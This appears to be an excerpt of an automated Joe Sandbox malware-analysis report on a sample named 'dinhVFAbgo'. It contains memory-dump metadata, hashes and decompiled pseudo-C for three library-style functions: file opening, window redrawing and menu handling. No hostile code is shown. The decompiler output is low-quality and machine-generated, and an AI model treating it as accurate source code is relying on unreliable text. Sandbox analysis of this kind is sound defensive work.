0x00df8695
0x00df869c
0x00df86a0
0x00df86a2
0x00df86a5
0x00df86ac
0x00df86ac
0x00df86af
0x00df86b1
0x00df86b4
0x00df86b9
0x00df86bc
0x00df86c5
0x00df86c5
0x00df86c9
0x00df86cc
0x00df86ce
0x00df86d4
0x00df86d6
0x00df86df
0x00df86e0
0x00df86e2
0x00df86e6
0x00df86e7
0x00df86eb
0x00df86ee
0x00df86f8
0x00df86fd
0x00df8700
0x00df870f
0x00df870f
0x00df8713
0x00df8716
0x00df8718
0x00df871a
0x00df871c
0x00df8721
0x00df8723
0x00df8727
0x00df8728
0x00df872e
0x00df8738
0x00df8739
0x00df873c
0x00df8741
0x00df8744
0x00df8753
0x00df8753
0x00df8757
0x00df875a
0x00df875c
0x00df875e
0x00df8760
0x00df8762
0x00df8768
0x00df8768
0x00df8769
0x00df8778
0x00df877b
0x00df877c
0x00df877c
0x00df8760
0x00df875c
0x00df8744
0x00df871c
0x00df8718
0x00df8700
0x00df86d6
0x00df86ce
0x00df8782
0x00df8788
0x00df878a
0x00df87fd
0x00df87fd
0x00df8801
0x00df8811
0x00df8817
0x00df8819
0x00df8875
0x00df8875
0x00df887d
0x00df887e
0x00df8880
0x00df8899
0x00df889c
0x00df87d9
0x00df87da
0x00000000
0x00df87df
0x00df88a2
0x00000000
0x00df88a2
0x00df8887
0x00df8892
0x00000000
0x00df8892
0x00df881b
0x00df881e
0x00df8821
0x00000000
0x00000000
0x00df8823
0x00df8823
0x00df8826
0x00df8829
0x00df882c
0x00df8833
0x00df8838
0x00df883a
0x00df883e
0x00df8859
0x00df885d
0x00df885e
0x00df8861
0x00df8862
0x00df886e
0x00df8864
0x00df8864
0x00df8864
0x00df8840
0x00df8840
0x00df8840
0x00df884b
0x00df8850
0x00df8853
0x00df8853
0x00000000
0x00df8838
0x00df878f
0x00df8792
0x00df8799
0x00df879e
0x00000000
0x00000000
0x00df87a7
0x00df87ad
0x00df87af
0x00000000
0x00000000
0x00df87b1
0x00df87b5
0x00000000
0x00000000
0x00df87c9
0x00df87cf
0x00df87d1
0x00df87f5
0x00df87f8
0x00000000
0x00df87f8
0x00df87d3
0x00000000
0x00df8661
0x00df8666
0x00df8671
0x00df87e0
0x00df87e0
0x00df87e0
0x00df87e3
0x00df87e4
0x00000000
0x00df87ec
0x00df865f
0x00df862e
0x00df85d9
0x00df85dc
0x00df85f0
0x00df85f2
0x00df8613
0x00df8616
0x00df8619
0x00df861c
0x00000000
0x00df861c
0x00000000
0x00df85de
0x00df85de
0x00df85e1
0x00df85e4
0x00000000
0x00df85e4
0x00df85dc
0x00df8591
0x00df8596
0x00df859e
0x00000000
0x00df852e
0x00df8533
0x00df8536
0x00df853b
0x00df88c5
0x00000000
0x00df88c5

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f81f0f272d2ab4f7ef81983e5afedb0fc49d70caa1b43ea079dbf7005777c48
Instruction ID: 83e7b215bb0358ea51f17edbdbf751f3ec18e48ba4e9768678ec2d84f8e19847
Opcode Fuzzy Hash: 8f81f0f272d2ab4f7ef81983e5afedb0fc49d70caa1b43ea079dbf7005777c48
Instruction Fuzzy Hash: 22C1E4B4D0424DAFDF01EF99D880BBD7BB4EF49344F298059E655AB292CB309901DB72

Uniqueness

Uniqueness Score: -1.00%

Function 00E04C28 Relevance: 13.8, APIs: 9, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 43%

			E00E04C28(void* __ecx, void* __eflags, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t162;
				intOrPtr _t178;
				signed int* _t186;
				void* _t188;
				signed int* _t189;
				signed int _t191;
				char _t196;
				signed int _t202;
				signed int _t205;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t224;
				signed int _t226;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				signed int _t238;
				signed char _t241;
				signed int _t242;
				intOrPtr _t246;
				void* _t249;
				void* _t253;
				void* _t263;
				signed int _t264;
				signed int _t267;
				signed int _t268;
				signed int _t271;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t281;
				void* _t285;
				signed int _t289;

				_t263 = E00E04976(__ecx,  &_v72, _a16, _a20, _a24);
				_t191 = 6;
				memcpy( &_v48, _t263, _t191 << 2);
				_t275 = _t273 + 0x1c;
				_t249 = _t263 + _t191 + _t191;
				_t264 = _t263 | 0xffffffff;
				_t288 = _v36 - _t264;
				if(_v36 != _t264) {
					_t114 = E00DED6CF(_t188, _t249, _t264, __eflags);
					_t189 = _a8;
					 *_t189 = _t114;
					__eflags = _t114 - _t264;
					if(__eflags != 0) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t276 = _t275 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t276,  &_v48, 1 << 2);
						_t196 = 0;
						_t253 = E00E048E1();
						_t278 = _t276 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t253);
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E00DED61A(_t196, _t253,  *_t189, _t253);
								_t241 = _v5 | 0x00000001;
								_v5 = _t241;
								_v48 = _t241;
								 *( *((intOrPtr*)(0xe89460 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) = _t241;
								_t202 =  *_t189;
								_t204 = (_t202 & 0x0000003f) * 0x38;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0xe89460 + (_t202 >> 6) * 4)) + 0x29 + (_t202 & 0x0000003f) * 0x38)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L22:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t279 = _t278 - 0x18;
									_t205 = 6;
									_push( *_t189);
									memcpy(_t279,  &_v48, _t205 << 2);
									_t134 = E00E0468E(_t189,  &_v48 + _t205 + _t205,  &_v48);
									_t242 =  *_t189;
									_t267 = _t134;
									_t281 = _t279 + 0x30;
									__eflags = _t267;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0xe89460 + (_t242 >> 6) * 4)) + 0x29 + (_t242 & 0x0000003f) * 0x38)) = _v6;
										 *( *((intOrPtr*)(0xe89460 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0xe89460 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0xe89460 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t224 =  *_t189;
												_t226 = (_t224 & 0x0000003f) * 0x38;
												_t162 =  *((intOrPtr*)(0xe89460 + (_t224 >> 6) * 4));
												_t87 = _t162 + _t226 + 0x28;
												 *_t87 =  *(_t162 + _t226 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t268 = _v44;
										__eflags = (_t268 & 0xc0000000) - 0xc0000000;
										if((_t268 & 0xc0000000) != 0xc0000000) {
											L32:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L32;
											}
											CloseHandle(_v12);
											_v44 = _t268 & 0x7fffffff;
											_t214 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t281 - 0x18,  &_v48, _t214 << 2);
											_t246 = E00E048E1();
											__eflags = _t246 - 0xffffffff;
											if(_t246 != 0xffffffff) {
												_t216 =  *_t189;
												_t218 = (_t216 & 0x0000003f) * 0x38;
												__eflags = _t218;
												 *((intOrPtr*)( *((intOrPtr*)(0xe89460 + (_t216 >> 6) * 4)) + _t218 + 0x18)) = _t246;
												goto L32;
											}
											E00DE5884(GetLastError());
											 *( *((intOrPtr*)(0xe89460 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0xe89460 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
											E00DED7E2( *_t189);
											L10:
											goto L2;
										}
									}
									_push(_t242);
									goto L21;
								} else {
									_t267 = E00E04AF0(_t204,  *_t189);
									__eflags = _t267;
									if(__eflags == 0) {
										goto L22;
									}
									_push( *_t189);
									L21:
									E00DF7B40(__eflags);
									return _t267;
								}
							}
							_t271 = GetLastError();
							E00DE5884(_t271);
							 *( *((intOrPtr*)(0xe89460 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0xe89460 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
							CloseHandle(_t253);
							__eflags = _t271;
							if(__eflags == 0) {
								 *((intOrPtr*)(E00DE58BA(__eflags))) = 0xd;
							}
							goto L2;
						}
						_t233 = _v44;
						__eflags = (_t233 & 0xc0000000) - 0xc0000000;
						if((_t233 & 0xc0000000) != 0xc0000000) {
							L9:
							_t234 =  *_t189;
							_t236 = (_t234 & 0x0000003f) * 0x38;
							_t178 =  *((intOrPtr*)(0xe89460 + (_t234 >> 6) * 4));
							_t33 = _t178 + _t236 + 0x28;
							 *_t33 =  *(_t178 + _t236 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E00DE5884(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t285 = _t278 - 0x18;
						_v44 = _t233 & 0x7fffffff;
						_t238 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t285,  &_v48, _t238 << 2);
						_t196 = 0;
						_t253 = E00E048E1();
						_t278 = _t285 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E00DE58A7(__eflags)) =  *_t184 & 0x00000000;
						 *_t189 = _t264;
						 *((intOrPtr*)(E00DE58BA(__eflags))) = 0x18;
						goto L2;
					}
				} else {
					_t186 = E00DE58A7(_t288);
					 *_t186 =  *_t186 & 0x00000000;
					_t289 =  *_t186;
					 *_a8 = _t264;
					L2:
					return  *((intOrPtr*)(E00DE58BA(_t289)));
				}
			}

0x00e04c4b
0x00e04c4f
0x00e04c50
0x00e04c50
0x00e04c50
0x00e04c52
0x00e04c55
0x00e04c58
0x00e04c73
0x00e04c78
0x00e04c7b
0x00e04c7d
0x00e04c7f
0x00e04c9e
0x00e04ca5
0x00e04cac
0x00e04caf
0x00e04cbb
0x00e04cbe
0x00e04cc6
0x00e04cc7
0x00e04cca
0x00e04cca
0x00e04cd1
0x00e04cd3
0x00e04cd6
0x00e04cde
0x00e04ce1
0x00e04d4e
0x00e04d4f
0x00e04d55
0x00e04d57
0x00e04da0
0x00e04da3
0x00e04dac
0x00e04daf
0x00e04db2
0x00e04db4
0x00e04db4
0x00e04db4
0x00e04da5
0x00e04da8
0x00e04da8
0x00e04db9
0x00e04dbc
0x00e04dc8
0x00e04dcd
0x00e04dd9
0x00e04de3
0x00e04de7
0x00e04df1
0x00e04df4
0x00e04dff
0x00e04e04
0x00e04e23
0x00e04e26
0x00e04e2a
0x00e04e2b
0x00e04e31
0x00e04e36
0x00e04e39
0x00e04e3b
0x00e04e3d
0x00e04e42
0x00e04e44
0x00e04e46
0x00e04e49
0x00e04e4b
0x00e04e65
0x00e04e89
0x00e04e8d
0x00e04e91
0x00e04e93
0x00e04e97
0x00e04e99
0x00e04ea3
0x00e04ea6
0x00e04ead
0x00e04ead
0x00e04ead
0x00e04ead
0x00e04e97
0x00e04eb2
0x00e04ebe
0x00e04ec0
0x00e04f4b
0x00e04f4b
0x00000000
0x00e04ec6
0x00e04ec6
0x00e04eca
0x00000000
0x00000000
0x00e04ecf
0x00e04ee1
0x00e04ee9
0x00e04eec
0x00e04eed
0x00e04ef0
0x00e04ef7
0x00e04efc
0x00e04eff
0x00e04f33
0x00e04f3d
0x00e04f3d
0x00e04f47
0x00000000
0x00e04f47
0x00e04f08
0x00e04f21
0x00e04f28
0x00e04d48
0x00000000
0x00e04d48
0x00e04ec0
0x00e04e4d
0x00000000
0x00e04e06
0x00e04e0d
0x00e04e10
0x00e04e12
0x00000000
0x00000000
0x00e04e14
0x00e04e16
0x00e04e16
0x00000000
0x00e04e1c
0x00e04e04
0x00e04d5f
0x00e04d62
0x00e04d7d
0x00e04d82
0x00e04d88
0x00e04d8a
0x00e04d95
0x00e04d95
0x00000000
0x00e04d8a
0x00e04ce3
0x00e04cea
0x00e04cec
0x00e04d23
0x00e04d23
0x00e04d2d
0x00e04d30
0x00e04d37
0x00e04d37
0x00e04d37
0x00e04d43
0x00000000
0x00e04d43
0x00e04cee
0x00e04cf2
0x00000000
0x00000000
0x00e04cf4
0x00e04d03
0x00e04d08
0x00e04d0b
0x00e04d0c
0x00e04d0f
0x00e04d0f
0x00e04d16
0x00e04d18
0x00e04d1b
0x00e04d1e
0x00e04d21
0x00000000
0x00000000
0x00000000
0x00e04c81
0x00e04c86
0x00e04c89
0x00e04c90
0x00000000
0x00e04c90
0x00e04c5a
0x00e04c5a
0x00e04c5f
0x00e04c5f
0x00e04c65
0x00e04c67
0x00000000
0x00e04c6c

APIs

Part of subcall function 00E048E1: CreateFileW.KERNEL32(00000000,00000000,?,00E04CD1,?,?,00000000,?,00E04CD1,00000000,0000000C), ref: 00E048FE

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E04D3C
__dosmaperr.LIBCMT ref: 00E04D43
GetFileType.KERNEL32(00000000), ref: 00E04D4F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E04D59
__dosmaperr.LIBCMT ref: 00E04D62
CloseHandle.KERNEL32(00000000), ref: 00E04D82
CloseHandle.KERNEL32(00DF8C03), ref: 00E04ECF
GetLastError.KERNEL32 ref: 00E04F01
__dosmaperr.LIBCMT ref: 00E04F08

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID:
API String ID: 4237864984-0
Opcode ID: 29a69445d1705fa8516e27aff3ffd7ad165dc2552b733a37709ff87602487e0f
Instruction ID: 945f179e159b610c85eb15dd9f3a15d18ec0df643c3d504c133d9de8a6728cfc
Opcode Fuzzy Hash: 29a69445d1705fa8516e27aff3ffd7ad165dc2552b733a37709ff87602487e0f
Instruction Fuzzy Hash: 71A147B2A041488FDF19EF68DD917AD3BB1EB46328F185199E911BF2D2C7348C46C761

Uniqueness

Uniqueness Score: -1.00%

Function 00CD1624 Relevance: 13.7, APIs: 9, Instructions: 209
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E00CD1624(intOrPtr* __ecx, RECT* _a4, intOrPtr _a8) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				intOrPtr* _v44;
				RECT* _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t73;
				intOrPtr _t97;
				intOrPtr* _t114;
				long _t115;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr* _t132;
				intOrPtr _t141;
				intOrPtr _t148;
				void* _t153;
				RECT* _t154;
				signed int _t172;

				_t73 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t73 ^ _t172;
				_t127 = __ecx;
				_t154 = _a4;
				_t129 =  *((intOrPtr*)(__ecx + 0x3d8));
				_v48 = _t154;
				_v44 = _t129;
				if(_t129 != _t154) {
					if(_t129 != 0 &&  *((intOrPtr*)(_t129 + 0x58)) != 0) {
						 *0xe17a64(1);
						 *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0x188))))();
						_t129 = _v44;
					}
					 *((intOrPtr*)(_t127 + 0x3d8)) = _t154;
					 *0xe17a64(_t154, _t129);
					 *((intOrPtr*)( *((intOrPtr*)( *_t127 + 0x17c))))();
					_t132 = _v44;
					if(_t132 != 0) {
						 *0xe17a64(_t154);
						 *((intOrPtr*)( *((intOrPtr*)( *_t132 + 0x74))))();
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						SetRectEmpty(_v44 + 0x40);
						if(_a8 != 0) {
							_t114 = _v44;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							if( *((intOrPtr*)(_t114 + 0x5c)) != 0) {
								L10:
								_t115 = _v24.right;
							} else {
								 *0xe17a64();
								if( *((intOrPtr*)( *((intOrPtr*)( *_t114 + 0x9c))))() == 0) {
									goto L10;
								} else {
									_t115 =  *((intOrPtr*)(_t127 + 0x358)) + _v24.left;
									_v24.right = _t115;
								}
							}
							_t148 = _v40.right;
							if(_t148 > _t115) {
								_v24.right = _t148;
							}
							InvalidateRect( *(_t127 + 0x20),  &_v40, 1);
							InvalidateRect( *(_t127 + 0x20),  &_v24, 1);
						}
						_t132 = _v44;
						_t154 = _v48;
					}
					if(_t154 == 0) {
						if(_a8 != 0) {
							goto L27;
						}
					} else {
						 *0xe17a64(_t132);
						 *((intOrPtr*)( *((intOrPtr*)( *_t154 + 0x70))))();
						 *0xe17a64();
						if( *((intOrPtr*)( *((intOrPtr*)( *_t154 + 0x94))))() != 0) {
							 *0xe17a64();
							 *((intOrPtr*)( *((intOrPtr*)( *_t154 + 0x78))))();
						}
						if(_a8 != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t154 = _v48;
							if( *((intOrPtr*)(_t154 + 0x5c)) != 0) {
								L22:
								_t97 = _v24.right;
							} else {
								 *0xe17a64();
								if( *((intOrPtr*)( *((intOrPtr*)( *_t154 + 0x9c))))() == 0) {
									goto L22;
								} else {
									_t97 =  *((intOrPtr*)(_t127 + 0x358)) + _v24.left;
									_v24.right = _t97;
								}
							}
							_t141 =  *((intOrPtr*)(_t154 + 0x48));
							if(_t141 > _t97) {
								_v24.right = _t141;
							}
							InvalidateRect( *(_t127 + 0x20),  &_v24, 1);
							InvalidateRect( *(_t127 + 0x20), _t154 + 0x40, 1);
							L27:
							if( *((intOrPtr*)(_t127 + 0x2fc)) != 0) {
								_v24.left = 0;
								_v24.top = 0;
								_v24.right = 0;
								_v24.bottom = 0;
								GetClientRect( *(_t127 + 0x20),  &_v24);
								_t154 =  &_v40;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_v40.top =  *((intOrPtr*)(_t127 + 0x334));
								InflateRect( &_v40, 0xfffffffc, 0xfffffffc);
								InvalidateRect( *(_t127 + 0x20),  &_v40, 1);
							}
							UpdateWindow( *(_t127 + 0x20));
						}
					}
					_push( *((intOrPtr*)(_t127 + 0x3d8)));
				} else {
					_push(_t129);
				}
				 *0xe17a64();
				return E00DDCBCE( *((intOrPtr*)( *((intOrPtr*)( *_t127 + 0x1b8))))(), _t127, _v8 ^ _t172, _t153, _t154,  *((intOrPtr*)( *_t127 + 0x1b8)));
			}

0x00cd162a
0x00cd1631
0x00cd1635
0x00cd1639
0x00cd163c
0x00cd1642
0x00cd1645
0x00cd164a
0x00cd1654
0x00cd1668
0x00cd1670
0x00cd1672
0x00cd1672
0x00cd1679
0x00cd1687
0x00cd168f
0x00cd1691
0x00cd1696
0x00cd16a4
0x00cd16af
0x00cd16ba
0x00cd16bb
0x00cd16bc
0x00cd16bd
0x00cd16be
0x00cd16c8
0x00cd16ca
0x00cd16d7
0x00cd16d8
0x00cd16d9
0x00cd16da
0x00cd16db
0x00cd1704
0x00cd1704
0x00cd16dd
0x00cd16e7
0x00cd16f4
0x00000000
0x00cd16f6
0x00cd16fc
0x00cd16ff
0x00cd16ff
0x00cd16f4
0x00cd1707
0x00cd170c
0x00cd170e
0x00cd170e
0x00cd171a
0x00cd1729
0x00cd1729
0x00cd172f
0x00cd1732
0x00cd1732
0x00cd1737
0x00cd17ec
0x00000000
0x00000000
0x00cd173d
0x00cd1745
0x00cd174d
0x00cd1759
0x00cd1765
0x00cd176e
0x00cd1776
0x00cd1776
0x00cd177c
0x00cd1788
0x00cd1789
0x00cd178a
0x00cd178b
0x00cd178c
0x00cd1793
0x00cd17bb
0x00cd17bb
0x00cd1795
0x00cd179f
0x00cd17ab
0x00000000
0x00cd17ad
0x00cd17b3
0x00cd17b6
0x00cd17b6
0x00cd17ab
0x00cd17be
0x00cd17c3
0x00cd17c5
0x00cd17c5
0x00cd17d1
0x00cd17e0
0x00cd17ee
0x00cd17f6
0x00cd17f8
0x00cd17fb
0x00cd17fe
0x00cd1801
0x00cd180b
0x00cd181a
0x00cd181d
0x00cd1822
0x00cd1823
0x00cd1824
0x00cd1825
0x00cd182c
0x00cd183b
0x00cd183b
0x00cd1844
0x00cd1844
0x00cd177c
0x00cd184a
0x00cd164c
0x00cd164c
0x00cd164c
0x00cd185a
0x00cd1872

APIs

SetRectEmpty.USER32(?), ref: 00CD16BE
InvalidateRect.USER32(?,?,00000001), ref: 00CD171A
InvalidateRect.USER32(?,?,00000001), ref: 00CD1729

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$Invalidate$Empty
String ID:
API String ID: 1126320529-0
Opcode ID: 45dd8a74c2179a54210e5d7c3dcf14696b432b12b4a9116a7fe8fb0f1c2998e8
Instruction ID: db506f787505081711eb11f2ab2e260b63f560d8cc89a74fc539a73ccfa066c7
Opcode Fuzzy Hash: 45dd8a74c2179a54210e5d7c3dcf14696b432b12b4a9116a7fe8fb0f1c2998e8
Instruction Fuzzy Hash: 76812635A00215AFCB05CF65C884AEDB7B6FF48710F1940AAED16AB361DB70AE45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00CF0C2E Relevance: 13.6, APIs: 9, Instructions: 135
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00CF0C2E(intOrPtr* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				signed int _v12;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t48;
				signed int _t49;
				intOrPtr _t54;
				void* _t63;
				intOrPtr _t68;
				void* _t69;
				intOrPtr _t70;
				intOrPtr _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t83;
				intOrPtr _t85;

				_t70 = _a8;
				_v8 = __ecx;
				_t81 = _a4;
				_v12 =  *(__ecx + 0x9c) & 0x0000a000;
				 *0xe17a64(_t70, _t80, _t83, _t69, __ecx, __ecx);
				_t48 =  *((intOrPtr*)( *((intOrPtr*)( *_t81 + 0x68))))();
				_t85 = 0;
				if(_t48 != 0) {
					L22:
					_t75 = _v8;
					_t49 =  *((intOrPtr*)(_t75 + 0xc40));
					_v12 = _t49;
					if(_t49 == 0) {
						L31:
						return 1;
					}
					_v8 = _t75 + 0xc3c;
					while(1) {
						_t54 =  *((intOrPtr*)(E00CB29D4(_t81, _t85,  &_v12)));
						if(_t54 == _t81) {
							break;
						}
						_t85 = _t54;
						if(_v12 != 0) {
							continue;
						}
						goto L31;
					}
					if(_t85 != 0) {
						if(( *(_t85 + 0x24) & 0x00000001) != 0) {
							CheckMenuItem( *(_t70 + 4), 0x4215, 8);
						}
					} else {
						EnableMenuItem( *(_t70 + 4), 0x4215, 1);
					}
					goto L31;
				}
				if( *((intOrPtr*)(_t81 + 0xc)) == 0) {
					L6:
					EnableMenuItem( *(_t70 + 4), 0x420f, 1);
					goto L7;
				} else {
					if( *((intOrPtr*)(_t81 + 4)) == 0) {
						_t68 =  *((intOrPtr*)(_t81 + 0x34));
					} else {
						_t68 =  *((intOrPtr*)(_t81 + 0x38));
					}
					if(_t68 >= 0) {
						L7:
						if( *((intOrPtr*)(_t81 + 0x20)) == 0xffffffff ||  *((intOrPtr*)(_t81 + 0x20)) == _t85) {
							EnableMenuItem( *(_t70 + 4), 0x420e, 1);
						}
						if( *((intOrPtr*)(_t81 + 8)) != _t85 ||  *((intOrPtr*)(_t81 + 0x18)) != _t85 && _v12 != _t85) {
							_push(8);
							if( *((intOrPtr*)(_t81 + 0xc)) == _t85) {
								_push(0x4213);
							} else {
								_push(0x4214);
							}
						} else {
							_push(8);
							_push(0x4212);
						}
						CheckMenuItem( *(_t70 + 4), ??, ??);
						if( *((intOrPtr*)(_t81 + 0x18)) != _t85 && _v12 != _t85) {
							EnableMenuItem( *(_t70 + 4), 0x4212, 1);
						}
						 *0xe17a64(_t81);
						_t63 =  *((intOrPtr*)( *((intOrPtr*)( *_v8 + 0x40c))))();
						_t85 = 0;
						if(_t63 != 0) {
							EnableMenuItem( *(_t70 + 4), 0x4212, 1);
							EnableMenuItem( *(_t70 + 4), 0x4213, 1);
							EnableMenuItem( *(_t70 + 4), 0x4214, 1);
							 *((intOrPtr*)(_t81 + 8)) = 1;
							_t85 = 0;
						}
						goto L22;
					}
					goto L6;
				}
			}

0x00cf0c34
0x00cf0c3a
0x00cf0c44
0x00cf0c4c
0x00cf0c57
0x00cf0c5f
0x00cf0c61
0x00cf0c65
0x00cf0d4c
0x00cf0d4c
0x00cf0d4f
0x00cf0d55
0x00cf0d5a
0x00cf0daf
0x00cf0db6
0x00cf0db6
0x00cf0d62
0x00cf0d65
0x00cf0d70
0x00cf0d74
0x00000000
0x00000000
0x00cf0d7a
0x00cf0d7f
0x00000000
0x00000000
0x00000000
0x00cf0d81
0x00cf0d85
0x00cf0d9d
0x00cf0da9
0x00cf0da9
0x00cf0d87
0x00cf0d91
0x00cf0d91
0x00000000
0x00cf0d85
0x00cf0c6e
0x00cf0c81
0x00cf0c8b
0x00000000
0x00cf0c70
0x00cf0c73
0x00cf0c7a
0x00cf0c75
0x00cf0c75
0x00cf0c75
0x00cf0c7f
0x00cf0c91
0x00cf0c95
0x00cf0ca6
0x00cf0ca6
0x00cf0caf
0x00cf0cc4
0x00cf0cc9
0x00cf0cd2
0x00cf0ccb
0x00cf0ccb
0x00cf0ccb
0x00cf0cbb
0x00cf0cbb
0x00cf0cbd
0x00cf0cbd
0x00cf0cda
0x00cf0ce3
0x00cf0cf4
0x00cf0cf4
0x00cf0d08
0x00cf0d11
0x00cf0d13
0x00cf0d17
0x00cf0d23
0x00cf0d32
0x00cf0d41
0x00cf0d47
0x00cf0d4a
0x00cf0d4a
0x00000000
0x00cf0d17
0x00000000
0x00cf0c7f

APIs

EnableMenuItem.USER32 ref: 00CF0C8B
EnableMenuItem.USER32 ref: 00CF0CA6
